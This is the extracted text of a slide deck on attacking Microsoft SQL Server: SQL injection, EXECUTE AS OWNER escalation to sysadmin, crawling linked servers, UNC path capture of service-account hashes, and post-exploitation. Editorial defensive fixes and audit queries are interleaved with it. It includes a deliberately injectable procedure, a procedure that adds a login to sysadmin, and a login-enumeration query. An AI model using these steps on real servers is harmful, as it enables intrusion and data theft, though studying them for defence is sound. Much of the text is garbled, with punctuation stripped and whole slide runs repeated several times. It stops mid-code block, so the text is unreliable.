Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
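The injectable procedure above rewritten so the argument can never become part of the SQL text, as an added example that is not from the slides or PowerUpSQL; the procedure name sp_sqli2_fixed is made up, and the modern sys.databases view replaces the deprecated master..sysdatabases.

```sql
-- Added example (not from the original slides): parameterised rewrite of sp_sqli2.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname            -- a database name never needs varchar(max)
AS
BEGIN
    SET NOCOUNT ON;
    -- Same query shape as the original, but the search term is passed to
    -- sp_executesql as a typed parameter, so quotes inside @DbName are just data.
    DECLARE @query nvarchar(max) = N'
        SELECT name
        FROM sys.databases
        WHERE name LIKE ''%'' + @pattern + ''%'' OR name = N''tempdb'';';
    EXEC sp_executesql @query, N'@pattern sysname', @pattern = @DbName;
END
GO
-- An apostrophe in the argument is harmless here. Concatenated into the original
-- procedure it would terminate the string literal and the remainder would run as SQL.
EXEC dbo.sp_sqli2_fixed @DbName = N'Report''s';
```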
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server you have it on all of them
One account to rule them all
[Diagram: Leveraging Shared MS SQL Server Service Accounts. Zones: Internet, DMZ, Intranet. Hosts: LRA, HVA, LVA, ADS. Ports 80 and 443; ports 1433 and 1434. Attack path (Captain Evil, PURE EVIL): 1. SQL Injection; 2. Execute local command via xp_cmdshell; 3. Access to HVA with shared domain service account, then execute commands and gather data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges
Crawling Server Links
Escalating Privileges: Crawling Server Links
What's a database link?
Database links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
  SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
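An added audit query for the links just described (not from the slides or PowerUpSQL): it lists every linked server on the instance with its login mapping, so a link that carries a fixed privileged remote login, the "DB Link with SA account" case in the next diagram, stands out from pass-through or least-privilege links. It uses only the catalog views sys.servers, sys.linked_logins and sys.server_principals.

```sql
-- Added audit query (not from the original slides): how does each linked server
-- authenticate to the remote side, and for which local logins?
SELECT
    s.name                                    AS link_name,
    s.data_source                             AS remote_data_source,
    s.product,
    s.is_rpc_out_enabled,                     -- 1 = EXEC ... AT [link] is allowed
    s.is_data_access_enabled,                 -- 1 = OPENQUERY / four-part names work
    CASE WHEN ll.local_principal_id = 0
         THEN N'<all logins without an explicit mapping>'
         ELSE sp.name END                     AS local_login,
    ll.uses_self_credential,                  -- 1 = caller's own credentials are forwarded
    ll.remote_name,                           -- fixed remote login when not self-credential
    CASE
        WHEN ll.server_id IS NULL          THEN N'no login mapping defined'
        WHEN ll.uses_self_credential = 1   THEN N'pass-through (least privilege if the remote side is)'
        WHEN ll.remote_name IS NULL        THEN N'no remote login mapped'
        WHEN ll.remote_name = N'sa'        THEN N'REVIEW: fixed sa mapping'
        WHEN ll.local_principal_id = 0     THEN N'REVIEW: every local login becomes a fixed remote login'
        ELSE N'fixed remote login'
    END                                       AS assessment
FROM sys.servers AS s
LEFT JOIN sys.linked_logins     AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;
```

Rows marked REVIEW are the ones where a public-role login on this server ends up with more on the remote server than it has here; crawling follows exactly those.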
[Diagram: Leveraging MS SQL Database links. Zones: Internet, DMZ, Intranet. Hosts: LRA, HVA, LVA, ADS, DB1. Ports 80 and 443; ports 1433 and 1434. Attack path (Captain Evil, PURE EVIL): 1. SQL Injection; a DB link with least privileges, followed by a DB link with the SA account; 2. Execute SQL queries and local commands on database servers via nested linked services. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we've seen.
Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker
• An attacker can then capture the NetNTLM password hash and crack or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges: UNC Path Injection
Oh yeah…
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path:
xp_dirtree, xp_fileexists
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.
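To check for and close that default grant, an added T-SQL audit and fix that is not from the slides or PowerUpSQL; it assumes sysadmin access to master, and the catalog views used (sys.database_permissions, sys.objects, sys.database_principals) are standard.

```sql
-- Added example (not from the original slides): which file-path procedures in
-- master can PUBLIC execute, and revoke the grant on the two named above.
USE master;
GO
SELECT
    o.name                  AS procedure_name,
    pr.name                 AS grantee,
    dp.permission_name,
    dp.state_desc           -- GRANT means every login on the instance has it
FROM sys.database_permissions    AS dp
JOIN sys.objects                 AS o  ON o.object_id = dp.major_id
JOIN sys.database_principals     AS pr ON pr.principal_id = dp.grantee_principal_id
WHERE dp.class_desc       = N'OBJECT_OR_COLUMN'
  AND dp.permission_name  = N'EXECUTE'
  AND pr.name             = N'public'
  AND o.name IN (N'xp_dirtree', N'xp_fileexists');
GO
-- Mitigation: remove the default grant. Members of sysadmin keep access implicitly;
-- applications that legitimately call these procedures get an explicit grant instead.
REVOKE EXECUTE ON sys.xp_dirtree   FROM public;
REVOKE EXECUTE ON sys.xp_fileexists FROM public;
GO
```

Re-run the SELECT afterwards; it should return no rows. Test application accounts before rolling the revoke out, since some products call xp_fileexists during installation or backup jobs.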
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach              2000  2005  2008  2012  2014  2016
LSA Secrets            x     x     x     x     x     x
Local Administrator    x     x
LocalSystem            x     x     x
Process Migration      x     x     x     x     x     x
Token Stealing         x     x     x     x     x     x
Single User Mode             x     x     x     x     x
(Column placement for the Local Administrator, LocalSystem and Single User Mode rows is an editorial reconstruction, since the slide layout was lost in extraction: local Administrators lost default sysadmin membership after 2005 and LocalSystem after 2008.)

Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options.
Approach: Common Tools
• Access as Local Administrator: Management Studio, sqlcmd, and other native SQL client tools
• Access as LocalSystem: Psexec, accessibility options, debugger with native SQL client tools
• Recover SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
• Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
• Steal authentication token from SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
• Single User Mode: DBATools
Common Post Exploitation Activities
Post Exploitation Overview: Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server Layer: startup procedures, agent jobs, triggers, modified code
   • OS Layer: Registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
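The Luhn check from step 2 written in T-SQL, as an added example that is not PowerUpSQL's own implementation; the same function serves a defender running data discovery over sampled columns. dbo.fn_LuhnValid and the dbo.Payments/CardRef names in the usage query are made up.

```sql
-- Added example (not from the original slides or PowerUpSQL): a T-SQL Luhn check
-- for triaging sampled column values. Function and table names are placeholders.
CREATE FUNCTION dbo.fn_LuhnValid (@candidate nvarchar(64))
RETURNS bit
AS
BEGIN
    -- Normalise sampled data: card numbers are often stored with spaces or dashes
    DECLARE @digits nvarchar(64) = REPLACE(REPLACE(@candidate, N' ', N''), N'-', N'');
    -- Reject anything that is not 13 to 19 decimal digits before doing arithmetic
    IF @digits IS NULL OR @digits LIKE N'%[^0-9]%' OR LEN(@digits) NOT BETWEEN 13 AND 19
        RETURN 0;

    DECLARE @sum int = 0, @pos int = LEN(@digits), @double bit = 0, @d int;
    -- Walk from the rightmost digit, doubling every second one and folding >9 to one digit
    WHILE @pos > 0
    BEGIN
        SET @d = CAST(SUBSTRING(@digits, @pos, 1) AS int);
        IF @double = 1
            SET @d = CASE WHEN @d * 2 > 9 THEN @d * 2 - 9 ELSE @d * 2 END;
        SET @sum = @sum + @d;
        SET @double = CASE WHEN @double = 1 THEN 0 ELSE 1 END;
        SET @pos = @pos - 1;
    END
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END
GO
-- Constructed check values: 4111 1111 1111 1111 is the well-known Luhn-valid test
-- number; changing its last digit breaks the checksum, and a short string is rejected.
SELECT dbo.fn_LuhnValid(N'4111 1111 1111 1111') AS valid_with_spaces,
       dbo.fn_LuhnValid(N'4111111111111112')    AS bad_check_digit,
       dbo.fn_LuhnValid(N'12345')               AS too_short;
GO
-- Usage against a sampled column: a LIKE pre-filter narrows the candidates, the
-- Luhn check removes false positives such as order numbers and phone numbers.
SELECT TOP (100) CardRef
FROM dbo.Payments
WHERE CardRef LIKE N'%[0-9][0-9][0-9][0-9]%'
  AND dbo.fn_LuhnValid(CardRef) = 1;
```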
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges: Impersonation - SQL Injection Example

CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
-- Vulnerable on purpose: the caller's @DbName is concatenated straight into dynamic SQL
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
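As an added example rather than the slides' own code, the same procedure with the concatenation replaced by a bound parameter, followed by an audit query that flags procedures combining EXECUTE AS with dynamic SQL; sp_sqli2_fixed is a placeholder name.

```sql
-- Added example, not from the original slides: sp_sqli2 with the injection removed, then a
-- query that finds other procedures built the risky way. sp_sqli2_fixed is a placeholder.
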